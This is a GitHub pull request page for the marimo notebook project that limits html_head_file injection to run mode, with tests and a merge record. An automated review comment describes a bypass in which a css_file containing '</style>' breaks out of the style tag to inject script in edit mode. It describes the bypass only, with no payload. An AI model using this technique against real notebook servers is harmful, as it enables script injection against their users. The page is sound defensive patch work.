Skip to content

fix: restrict head_html to run#9137

Merged
dmadisetti merged 2 commits intomainfrom
dm/disable-just-html
Apr 10, 2026
Merged

fix: restrict head_html to run#9137
dmadisetti merged 2 commits intomainfrom
dm/disable-just-html

Conversation

@dmadisetti
Copy link
Copy Markdown
Collaborator

@dmadisetti dmadisetti commented Apr 10, 2026

📝 Summary

Copilot AI review requested due to automatic review settings April 10, 2026 18:46
@vercel
Copy link
Copy Markdown

vercel bot commented Apr 10, 2026
edited
Loading

The latest updates on your projects. Learn more about Vercel for GitHub.

Project Deployment Actions Updated (UTC)
marimo-docs Ready Ready Preview, Comment Apr 10, 2026 6:48pm

Request Review

Copilot AI reviewed Apr 10, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Restricts per-notebook html_head_file injection so it only applies in SessionMode.RUN, preventing arbitrary head markup/scripts from being included when a notebook is opened in edit mode.

Changes:

  • Gate app_config.html_head_file injection behind mode == SessionMode.RUN in notebook_page_template.
  • Add tests asserting: CSS file injection still works in edit mode; html_head_file is blocked in edit mode and allowed in run mode; global html_head is still allowed in edit mode.

Reviewed changes

Copilot reviewed 2 out of 2 changed files in this pull request and generated 1 comment.

File Description
marimo/_server/templates/templates.py Adds the SessionMode.RUN guard for html_head_file injection in notebook_page_template.
tests/_server/templates/test_templates.py Adds regression tests covering edit vs run behavior for css_file, html_head_file, and global html_head.

Comment thread marimo/_server/templates/templates.py
Comment on lines +326 to 330
# html_head_file is blocked in edit mode: it can contain arbitrary scripts
# and markup that could exfiltrate data or redress the UI. CSS-only styling
# (css_file) is permitted. Run mode is unaffected.
if mode == SessionMode.RUN and app_config.html_head_file:
head_contents = read_html_head_file(
Copy link

Copilot AI Apr 10, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The new comment implies css_file is a safe “CSS-only” alternative in edit mode, but _custom_css_block() inlines CSS unescaped, so a malicious CSS file can break out of the <style> tag (e.g., by including </style>), allowing arbitrary HTML/script injection in edit mode. If the goal is to prevent untrusted notebooks from injecting scripts in edit mode, consider either sanitizing/escaping style contents (at minimum neutralize </style sequences) or applying the same mode restriction to css_file as well; otherwise the html_head_file block can be bypassed via css_file.

Copilot uses AI. Check for mistakes.
@dmadisetti dmadisetti added the bug Something isn't working label Apr 10, 2026
@dmadisetti dmadisetti merged commit e1adaa0 into main Apr 10, 2026
42 of 45 checks passed
@dmadisetti dmadisetti deleted the dm/disable-just-html branch April 10, 2026 18:56
@github-actions
Copy link
Copy Markdown

github-actions bot commented Apr 10, 2026

🚀 Development release published. You may be able to view the changes at https://marimo.app?v=0.23.1-dev21

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

Copilot code review Copilot Copilot left review comments

@mscolnick mscolnick mscolnick approved these changes

Assignees

No one assigned

Labels

bug Something isn't working

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@dmadisetti @mscolnick